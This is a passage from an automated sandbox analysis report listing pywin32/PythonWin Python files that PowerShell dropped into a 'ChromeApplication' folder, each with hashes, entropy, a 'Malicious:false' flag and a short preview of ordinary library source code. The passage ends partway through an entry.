                                                                                                                                                                                                  Preview:# We no longer support the old, non-colour editor!..import os.import shutil.import traceback..import win32api.import win32con.import win32ui.from pywin.framework.editor import GetEditorOption.from pywin.mfc import docview, object..BAK_NONE = 0.BAK_DOT_BAK = 1.BAK_DOT_BAK_TEMP_DIR = 2.BAK_DOT_BAK_BAK_DIR = 3..MSG_CHECK_EXTERNAL_FILE = (. win32con.WM_USER + 1999.) ## WARNING: Duplicated in editor.py and coloreditor.py..import pywin.scintilla.document..ParentEditorDocument = pywin.scintilla.document.CScintillaDocument...class EditorDocumentBase(ParentEditorDocument):. def __init__(self, template):. self.bAutoReload = GetEditorOption("Auto Reload", 1). self.bDeclinedReload = 0 # Has the user declined to reload.. self.fileStat = None. self.bReportedFileNotFound = 0.. # what sort of bak file should I create.. # default to write to %temp%/bak/filename.ext. self.bakFileType = GetEditorOption("Backup Type", BAK_DOT_BAK_BAK_DIR).. s

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\editor\editor.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18241
                                                                                                                                                                                                  Entropy (8bit):4.679743271147803
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:GxM2a7TANZA/jdj7vql7INAU4m27dZ10Ny6pUcovM:r20/jdjk0F4nLc6M
                                                                                                                                                                                                  MD5:E90815BE95E40481C0662A2B431B3B70
                                                                                                                                                                                                  SHA1:9B282536957675F8983DFA15B5C4A8826BA990F5
                                                                                                                                                                                                  SHA-256:916A3ACBC2EB68D868EB759A8F84FA7FAD05FB027F0CB988C8449D77A42B6F15
                                                                                                                                                                                                  SHA-512:50A45101CE6052A210573BD7FE2318FCFDE8B131519684E5F8062F892DE30E38D9B283A222287D645F4F6D667A7C05F81AEB2D5523E0FF07902A9C6E7D3C1C88
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#####################################################################.#.# editor.py.#.# A general purpose text editor, built on top of the win32ui edit.# type, which is built on an MFC CEditView.#.#.# We now support reloading of externally modified documented.# (eg, presumably by some other process, such as source control or.# another editor..# We also suport auto-loading of externally modified files..# - if the current document has not been modified in this.# editor, but has been modified on disk, then the file.# can be automatically reloaded..#.# Note that it will _always_ prompt you if the file in the editor has been modified....import re..import regex.import win32api.import win32con.import win32ui.from pywin.framework.editor import (. GetEditorFontOption,. GetEditorOption,. SetEditorFontOption,. SetEditorOption,. defaultCharacterFormat,.).from pywin.mfc import afxres, dialog, docview..patImport = regex.symcomp("import \(<name>.*\)").patIndent = regex.compile("^\\([ \

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\editor\frame.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3148
                                                                                                                                                                                                  Entropy (8bit):4.627065154645439
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ttRrHY/x7hqAmfVqVm9Je4ihNnfSns4Kwsh+aNe5SwxVX:1DY3kk5tnfWs4f3z
                                                                                                                                                                                                  MD5:A034E2B9E4870B7FADA5486BA9711DDE
                                                                                                                                                                                                  SHA1:B1B7A761FB80D86965A9E0F2592995369D316646
                                                                                                                                                                                                  SHA-256:961BC3585606E76DDA52639617BF5ABC83B7AF4A5C6829C0149E8DD156DD614A
                                                                                                                                                                                                  SHA-512:FA67A42CAAA4B1C2F8D9AE8C44467A02686959C08E4A4BD7E0E5B3F10E8343F507D0BB4C48F4CF90006CDD61E54D0D172FA3270CED828F9069EA51CF3DCB05B0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# frame.py - The MDI frame window for an editor..import pywin.framework.window.import win32con.import win32ui..from . import ModuleBrowser...class EditorFrame(pywin.framework.window.MDIChildWnd):. def OnCreateClient(self, cp, context):. # Create the default view as specified by the template (ie, the editor view). view = context.template.MakeView(context.doc). # Create the browser view.. browserView = ModuleBrowser.BrowserView(context.doc). view2 = context.template.MakeView(context.doc).. splitter = win32ui.CreateSplitter(). style = win32con.WS_CHILD | win32con.WS_VISIBLE. splitter.CreateStatic(self, 1, 2, style, win32ui.AFX_IDW_PANE_FIRST). sub_splitter = self.sub_splitter = win32ui.CreateSplitter(). sub_splitter.CreateStatic(splitter, 2, 1, style, win32ui.AFX_IDW_PANE_FIRST + 1).. # Note we must add the default view first, so that doc.GetFirstView() returns the editor view.. sub_splitter.CreateView(

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\editor\template.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2060
                                                                                                                                                                                                  Entropy (8bit):4.687667955810207
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:iLW8jY3Qq49QDK4FZ+l094wHH72NGQBarLSB:iLWHQkKflC4wHb2NjaPSB
                                                                                                                                                                                                  MD5:A98ABD4CDBD03193D44E5F1378AB0565
                                                                                                                                                                                                  SHA1:22B45559E08CABBF13B6145B3D7CE59B5273249E
                                                                                                                                                                                                  SHA-256:BDBBE1B47268C858B5DB33129225966062B1ADBFA7678712A4211BF8CDD7DDF9
                                                                                                                                                                                                  SHA-512:366F6B8138845A620FE342E3535980C8F44A871CD9A5B0DC86F4D828F332D3DA09A3D5215DECEA26D932F31ADF725802A33548134E8CD9FC53E4CAF6AF1AE19E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import os..import pywin.framework.window.import win32api.import win32ui.from pywin.mfc import docview..from . import frame..ParentEditorTemplate = docview.DocTemplate...class EditorTemplateBase(ParentEditorTemplate):. def __init__(. self, res=win32ui.IDR_TEXTTYPE, makeDoc=None, makeFrame=None, makeView=None. ):. if makeFrame is None:. makeFrame = frame.EditorFrame. ParentEditorTemplate.__init__(self, res, makeDoc, makeFrame, makeView).. def _CreateDocTemplate(self, resourceId):. assert 0, "You must override this".. def CreateWin32uiDocument(self):. assert 0, "You must override this".. def GetFileExtensions(self):. return ".txt", ".py".. def MatchDocType(self, fileName, fileType):. doc = self.FindOpenDocument(fileName). if doc:. return doc. ext = os.path.splitext(fileName)[1].lower(). if ext in self.GetFileExtensions():. return win32ui.CDocTemplate_Confidence_yesAttem

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\editor\vss.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3398
                                                                                                                                                                                                  Entropy (8bit):4.6330455844108895
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:ZLZA4QCHAr0bt4uG60UNmgr3E+ZezbPYcKPTGDLftwj8FtC:BZA4QL8t4nwxENQaC
                                                                                                                                                                                                  MD5:F5344413C1F70415897EEC86B0311BF0
                                                                                                                                                                                                  SHA1:D5A0B30A5D65EB96886B24259E81439FF235A0B0
                                                                                                                                                                                                  SHA-256:55FC7A2853787CFCA41A8FB4C8DA3F961844C0E56585BB82DD4DC7F8C9AE425F
                                                                                                                                                                                                  SHA-512:88891CE2D5D12B55ACA5F78BFB69D364733F8FFCDFA7CC17B34A806102431BDD2E1CC2A4B3DAA6D5628112C91A2A4B07CEED8DEEF46F88C621E8EAA7FE38E43F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# vss.py -- Source Control using Microsoft VSS...# Provides routines for checking files out of VSS..#.# Uses an INI file very similar to how VB integrates with VSS - even.# as far as using the same name...# The file must be named "Mssccprj.scc", and be in the format of.# an INI file. This file may be in a parent directory, in which.# case the project name will be built from what is specified in the.# ini file, plus the path from the INI file to the file itself..#.# The INI file should have a [Python] section, and a.# Project=Project Name.# and optionally.# Database=??...import os.import sys.import traceback..import win32api.import win32ui..g_iniName = "Mssccprj.scc" # Use the same INI name as VB!..g_sourceSafe = None...def FindVssProjectInfo(fullfname):. """Looks up the file system for an INI file describing the project... Looking up the tree is for ni style packages... Returns (projectName, pathToFileName) where pathToFileName contains. the path from the ini file to the

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\help.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5650
                                                                                                                                                                                                  Entropy (8bit):4.72058456476038
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:0OE6xRFsaobwYSJRzaj8N7XyIV7SuU9hyoVE4rMur8m4mM1np9sbexg:0RwYQRucryKWE44CfAp9sbea
                                                                                                                                                                                                  MD5:B12DFEEC2AB8B1758C1567D42C490B7B
                                                                                                                                                                                                  SHA1:DEF28BEE0C8FD8D60FBF0FA24B27232FF7E242C1
                                                                                                                                                                                                  SHA-256:AE8B27C1BE4EC2C6F7031D5C648949A1AD3A97ED2348BDD6D4015B9BF2E5FC78
                                                                                                                                                                                                  SHA-512:65672DE52090E79AE6FAB0637FB438323B2C9B049CBF44FDF69538D736DC92FD30445F9FC809833F1EB265FB85097272D11C48DDA62ADC6526D07E6E9B53DDD6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# help.py - help utilities for PythonWin..import os..import regutil.import win32api.import win32con.import win32ui..htmlhelp_handle = None..html_help_command_translators = {. win32con.HELP_CONTENTS: 1, # HH_DISPLAY_TOC. win32con.HELP_CONTEXT: 15, # HH_HELP_CONTEXT. win32con.HELP_FINDER: 1, # HH_DISPLAY_TOC.}...def FinalizeHelp():. global htmlhelp_handle. if htmlhelp_handle is not None:. import win32help.. try:. # frame = win32ui.GetMainFrame().GetSafeHwnd(). frame = 0. win32help.HtmlHelp(frame, None, win32help.HH_UNINITIALIZE, htmlhelp_handle). except win32help.error:. print("Failed to finalize htmlhelp!"). htmlhelp_handle = None...def OpenHelpFile(fileName, helpCmd=None, helpArg=None):. "Open a help file, given a full path". # default help arg.. win32ui.DoWaitCursor(1). try:. if helpCmd is None:. helpCmd = win32con.HELP_CONTENTS. ext = os.path.splitext(fileNam

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\interact.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):35912
                                                                                                                                                                                                  Entropy (8bit):4.631604153784839
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:x5X6GNjA+JE6JetPRGWrxoEAMcveFlGPDb22OzrDCqFq6CiTQ8ZUyI:xgGNjA+W6sbUkQok
                                                                                                                                                                                                  MD5:9CD632F14BE177B77B27EFA15380F89E
                                                                                                                                                                                                  SHA1:8609338B1A19E2991EF6A331051FCC046197FD8A
                                                                                                                                                                                                  SHA-256:7A37B60603FE6C5F541383AF8CC835DF73062B4CE72491E342D566AC3168F031
                                                                                                                                                                                                  SHA-512:230E5F663B955036E627162585D41DD85F80589706B326EE6150029B708D4A2D7C53A518339D146F287062D4AF0489B451F9FCEFE683ACEFF8A829E7DB6642AE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:##################################################################.##.## Interactive Shell Window.##..import array.import code.import os.import string.import sys.import traceback..import __main__.import afxres.import pywin.framework.app.import pywin.scintilla.control.import pywin.scintilla.formatter.import pywin.scintilla.IDLEenvironment.import win32api.import win32clipboard.import win32con.import win32ui..## sequential after ID_GOTO_LINE defined in editor.py.ID_EDIT_COPY_CODE = 0xE2002.ID_EDIT_EXEC_CLIPBOARD = 0x2003..trace = pywin.scintilla.formatter.trace..import re..from . import winout..# from IDLE.._is_block_opener = re.compile(r":\s*(#.*)?$").search._is_block_closer = re.compile(. r""". \s*. ( return. | break. | continue. | raise. | pass. ). \b.""",. re.VERBOSE,.).match..tracebackHeader = "Traceback (".encode("ascii")..sectionProfile = "Interactive Window".valueFormatTitle = "FormatTitle".valueFormatInput = "FormatInput".valueFormatOutput = "FormatO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\intpyapp.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20154
                                                                                                                                                                                                  Entropy (8bit):4.47952669125256
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:YQXph3afslMnEYeo3cRofuJ+gbK+E3sCsphc:YQ5hDlMcafuJ+gXCUc
                                                                                                                                                                                                  MD5:494E4047F3A33557E19707AA57A6762D
                                                                                                                                                                                                  SHA1:607C10F0CC8CF0578C3ABDA73154782478249ECF
                                                                                                                                                                                                  SHA-256:A0735F8B7E4A68D0A90034FB3C6ADF4E2DE58E44AC5261736EEB9F2279B496D0
                                                                                                                                                                                                  SHA-512:5923ABA95A148D885E5E5AA13BDA469FB76DCEBCB1E32B581DD40A086DDD80F9CFD86800432C94C0700DE893775D41F3BFD7F0206D5B3E604110AE552D8D9FF6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# intpyapp.py - Interactive Python application class.#.import os.import sys.import traceback..import __main__.import commctrl.import win32api.import win32con.import win32ui.from pywin.mfc import afxres, dialog..from . import app, dbgcommands..lastLocateFileName = ".py" # used in the "File/Locate" dialog......# todo - _SetupSharedMenu should be moved to a framework class..def _SetupSharedMenu_(self):. sharedMenu = self.GetSharedMenu(). from pywin.framework import toolmenu.. toolmenu.SetToolsMenu(sharedMenu). from pywin.framework import help.. help.SetHelpMenuOtherHelp(sharedMenu)...from pywin.mfc import docview..docview.DocTemplate._SetupSharedMenu_ = _SetupSharedMenu_...class MainFrame(app.MainFrame):. def OnCreate(self, createStruct):. self.closing = 0. if app.MainFrame.OnCreate(self, createStruct) == -1:. return -1. style = (. win32con.WS_CHILD. | afxres.CBRS_SIZE_DYNAMIC. | afxres.CBRS_TOP.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\intpydde.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1564
                                                                                                                                                                                                  Entropy (8bit):4.499942146153649
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:ph+YT5jFg2RSOmjhvtmAWyAjw88eimLk08AWyAjkEspeejHG9hBHRtWyA:ph+kFVSOmqeii8k08eBEscW47HLA
                                                                                                                                                                                                  MD5:192776AD66CE552D0274AE61888C7F9A
                                                                                                                                                                                                  SHA1:8F4C51333E175B4F23ACB4D7FA1BFC1AF5D0190F
                                                                                                                                                                                                  SHA-256:70FF4889CF52DB82518A24C5EF8CD7666E26DEB0C05EC5769579EA5634542AF8
                                                                                                                                                                                                  SHA-512:CD74E054097A2A4BDAEA83BB8AF338CA27B95427D623CD423187E0A19E43EDABBCFB805600A2027FD711E161DFF585DBCB41102106BBCE60BFBB58F5DDC29978
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# DDE support for Pythonwin.#.# Seems to work fine (in the context that IE4 seems to have broken.# DDE on _all_ NT4 machines I have tried, but only when a "Command Prompt" window.# is open. Strange, but true. If you have problems with this, close all Command Prompts!...import sys.import traceback..import win32api.import win32ui.from dde import *.from pywin.mfc import object...class DDESystemTopic(object.Object):. def __init__(self, app):. self.app = app. object.Object.__init__(self, CreateServerSystemTopic()).. def Exec(self, data):. try:. # ...print "Executing", cmd. self.app.OnDDECommand(data). except:. t, v, tb = sys.exc_info(). # The DDE Execution failed.. print("Error executing DDE command."). traceback.print_exception(t, v, tb). return 0...class DDEServer(object.Object):. def __init__(self, app):. self.app = app. object.Object.__init__(self, CreateServ

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\mdi_pychecker.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28975
                                                                                                                                                                                                  Entropy (8bit):4.5364847874971765
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:vyyYVP+wv0unqp3M8tkNdfoi0EiP+y0EWJWPl6kEF/ylQEqTEfDs2:6yYNB8uutEZ6GEqTEfDs2
                                                                                                                                                                                                  MD5:AF34F4E8CA5665CBD609C8D539D0C899
                                                                                                                                                                                                  SHA1:4748704FF60270C8760970AB0E96ED47900B394B
                                                                                                                                                                                                  SHA-256:5917B87F05758AD32E141DB916B83EBEC85F6C0E953B3C830875249E065638A2
                                                                                                                                                                                                  SHA-512:4289066989BBF6DEA727BD446D5626829C74E5FAC13B0424E7669A5A177A2261C7A0512DA3C4FFF0CC13498D9BB4F770923ECEC24392E598E9F1100B660D2804
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:######################################################################.##.## The Pychecker MDI Plug-In UserModule for Pythonwin.##.## contributed by Robert Kiendl.##.## Style is similar to (and inherited) from the SGrepMDI UserModule.##.## Usage:.##.## Start Pychecker on current file: Menu/File/New../Pychecker..## Use it: Jump to Pychecker warning source lines by double-click..## Auto-add "#$pycheck_no" / "#$pycheck_no=specific-re-pattern" tags.## to source lines by context/right-mouse-click on warning lines..##.## It requires pychecker installed and the pychecker.bat to be on.## the PATH. Example pychecker.bat:.##.## REM pychecker.bat.## C:\bin\python.exe C:\PYTHON23\Lib\site-packages\pychecker\checker.py %1 %2 %3 %4 %5 %6 %7 %8 %9.##.## Adding it as default module in PythonWin:.##.## +++ ./intpyapp.py.2006-10-02 17:59:32.974161600 +0200.## @@ -272,7 +282,7 @@.## .def LoadUserModules(self, moduleNames = None):.## ..# Load the users modules..## ..if moduleNames is None:.## -...d

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\scriptutils.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):23232
                                                                                                                                                                                                  Entropy (8bit):4.625752024930352
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:oGBB+9o1Nl4fJsAgdeNVAOdlP9FB7yL8OndbFeEii786sA8:oIWo1Nl4aAX9KFdhZBsA8
                                                                                                                                                                                                  MD5:3FA91AE2F8D827F6F7493636E3EF42DE
                                                                                                                                                                                                  SHA1:A1858B85AB1647DCACE4C5DC1E4D743997AB30AE
                                                                                                                                                                                                  SHA-256:B7BA3C633BD8B912FACDBB0EB706F57785DF1F5137AF6E62503938B3042AAABC
                                                                                                                                                                                                  SHA-512:1EEE85598BFB3405D617CC12FFDF7B51DBD9F689E3634054FB23C56AB56BC94D33F13189FECAC9D95041B6C4FA351CC9D3C079D97ED9E9B38B7BBB1108813E8F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""".Various utilities for running/importing a script.""".import bdb.import linecache.import os.import sys.import traceback..import __main__.import win32api.import win32con.import win32ui.from pywin.mfc import dialog.from pywin.mfc.docview import TreeView..from .cmdline import ParseArgs..RS_DEBUGGER_NONE = 0 # Dont run under the debugger..RS_DEBUGGER_STEP = 1 # Start stepping under the debugger.RS_DEBUGGER_GO = 2 # Just run under the debugger, stopping only at break-points..RS_DEBUGGER_PM = 3 # Dont run under debugger, but do post-mortem analysis on exception...debugging_options = """No debugging.Step-through in the debugger.Run in the debugger.Post-Mortem of unhandled exceptions""".split(. "\n".)..byte_cr = "\r".encode("ascii").byte_lf = "\n".encode("ascii").byte_crlf = "\r\n".encode("ascii")...# A dialog box for the "Run Script" command..class DlgRunScript(dialog.Dialog):. "A class for the 'run script' dialog".. def __init__(self, bHaveDebugger):. dialog.Dialog.__i

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\sgrepmdi.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):24972
                                                                                                                                                                                                  Entropy (8bit):4.450431007513399
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:H+YGPXCcujMf3MfDHIt0EiP+y0EiJW9elQENe8aQg:eYKScuLDHWGENe8aQg
                                                                                                                                                                                                  MD5:739FD32DA981B43D1CC9F7E98720017C
                                                                                                                                                                                                  SHA1:6EC45280E74CADCA61EA3BD1FEB16E23234E0284
                                                                                                                                                                                                  SHA-256:312C260C2E0385B6FBFE92975FC48943A8CEB34AF93D33D76E71497235CF155A
                                                                                                                                                                                                  SHA-512:56072052F6AABA2AFFAE9FEDBB3CDE6FE797720953645F65E741A01A8CEAC5FC04892F408076B1DF192E4F6DF81CDE85D9926CDAE686EBEC106337A67FA3E417
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# SGrepMDI is by Gordon McMillan (gmcm@hypernet.com).# It does basically what Find In Files does in MSVC with a couple enhancements..# - It saves any directories in the app's ini file (if you want to get rid.# .of them you'll have to edit the file).# - "Directories" can be directories,.# -.semicolon separated lists of "directories",.# -.environment variables that evaluate to "directories",.# -.registry path names that evaluate to "directories",.# -.all of which is recursive, so you can mix them all up..# - It is MDI, so you can 'nest' greps and return to earlier ones,.# .(ie, have multiple results open at the same time).# - Like FIF, double clicking a line opens an editor and takes you to the line..# - You can highlight text, right click and start a new grep with the selected.# .text as search pattern and same directories etc as before..# - You can save grep parameters (so you don't lose your hardearned pattern).# .from File|Save.# - You can save grep results by right clicking in t

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\startup.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2847
                                                                                                                                                                                                  Entropy (8bit):4.818753732087679
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:MJ7O/20AAgRoSEyd/S4+u3SF6ESlltYCfr5ZiVJEF7xgj8PKOW+cZFQEgD9L62D6:KK/2ugRUyd/S4f3oS/e0r6Iaj8C3YAO6
                                                                                                                                                                                                  MD5:6F528ECE40B18F85CB4695E07DEF6DE5
                                                                                                                                                                                                  SHA1:047EF48463C4DFE1129AAA4C357B202F31CAA822
                                                                                                                                                                                                  SHA-256:0DBCAA89CD5101BA15092209C424DC8039082F472E94207632D2875F2F5CBB27
                                                                                                                                                                                                  SHA-512:5C73CD1B0455106A183DF3FF83E5E5925DFE9DC59FF6C1210D6094AF087863897B4295773F6C3F0096F5B32E2A2FA536F97B872EF92F3C76BABA497940C1F7E8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# startup.py.#."The main application startup code for PythonWin."..#.# This does the basic command line handling...# Keep this as short as possible, cos error output is only redirected if.# this runs OK. Errors in imported modules are much better - the messages go somewhere (not any more :-)..import os.import sys..import win32api.import win32ui..if not sys.argv:. # Initialize sys.argv from commandline. When sys.argv is empty list (. # different from [''] meaning "no cmd line arguments" ), then C. # bootstrapping or another method of invocation failed to initialize. # sys.argv and it will be done here. ( This was a workaround for a bug in. # win32ui but is retained for other situations. ). argv = win32api.CommandLineToArgv(win32api.GetCommandLine()). sys.argv = argv[1:]. if os.getcwd() not in sys.path and "." not in sys.path:. sys.path.insert(0, os.getcwd())..# You may wish to redirect error output somewhere useful if you have startup errors..# eg, 'impor

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\stdin.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6584
                                                                                                                                                                                                  Entropy (8bit):4.430368341661001
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:S2A0DR1T8Is8HaxCYVN17vkgMMa14OnD0jdc2RoNQtDWjIH8wopCw:Sv091/BHaBvqztDJqtApT
                                                                                                                                                                                                  MD5:779DAA247AD98D623265DD978F8F45B2
                                                                                                                                                                                                  SHA1:228187723DEE7D4C4ECF4721A016E1834757DB96
                                                                                                                                                                                                  SHA-256:5AECCBD881306B45100F09997E93EED403E5D57809517BD7345F4D5ADC120CB6
                                                                                                                                                                                                  SHA-512:9511DE7A479F1311CE4B582D95CE66B101CB667D98AF8DD36580227D1EF048C62CBB8858DBFD7DC5C5C1096357B498D2803F6D9572A73682876080FA8598643F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Copyright (c) 2000 David Abrahams. Permission to copy, use, modify, sell.# and distribute this software is granted provided this copyright.# notice appears in all copies. This software is provided "as is" without.# express or implied warranty, and with no claim as to its suitability for.# any purpose.."""Provides a class Stdin which can be used to emulate the regular old.sys.stdin for the PythonWin interactive window. Right now it just pops.up a raw_input() dialog. With luck, someone will integrate it into the.actual PythonWin interactive window someday...WARNING: Importing this file automatically replaces sys.stdin with an.instance of Stdin (below). This is useful because you can just open.Stdin.py in PythonWin and hit the import button to get it set up right.if you don't feel like changing PythonWin's source. To put things back.the way they were, simply use this magic incantation:. import sys. sys.stdin = sys.stdin.real_file.""".import sys..try:. get_input_line = raw_input

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\toolmenu.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9369
                                                                                                                                                                                                  Entropy (8bit):4.707765657430447
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:xthkUOPG+/2okmwXMdGwstrsgKQQJ3pcSPupD2yIAZw6cRoKd:xthXOPG+8MQwsFsJQQJEf2
                                                                                                                                                                                                  MD5:9EC0D59C03FD3B953B91793523CAC864
                                                                                                                                                                                                  SHA1:5A6153011FD0A34FC0D51E70F011E9AFA8C78863
                                                                                                                                                                                                  SHA-256:DE941FAB3EDD0213569A624E7F2DFC744D29A9282CCEFFA20E278B273F651220
                                                                                                                                                                                                  SHA-512:0670C2BFB1C7A6A7C0CA6ABE898390F44D762383745666A8F812C0077206F79C852F61F596F16B82867CC1736E919103909A3533E18FEFC2DA61C4A37AE932D7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# toolmenu.py..import sys..import win32api.import win32con.import win32ui..from . import app..tools = {}.idPos = 100..# The default items should no tools menu exist in the INI file..defaultToolMenuItems = [. ("Browser", "win32ui.GetApp().OnViewBrowse(0,0)"),. (. "Browse PythonPath",. "from pywin.tools import browseProjects;browseProjects.Browse()",. ),. ("Edit Python Path", "from pywin.tools import regedit;regedit.EditRegistry()"),. ("COM Makepy utility", "from win32com.client import makepy;makepy.main()"),. (. "COM Browser",. "from win32com.client import combrowse;combrowse.main(modal=False)",. ),. (. "Trace Collector Debugging tool",. "from pywin.tools import TraceCollector;TraceCollector.MakeOutputWindow()",. ),.]...def LoadToolMenuItems():. # Load from the registry.. items = []. lookNo = 1. while 1:. menu = win32ui.GetProfileVal("Tools Menu\\%s" % lookNo, "", ""). if menu == "":.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin\pywin\framework\window.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):535
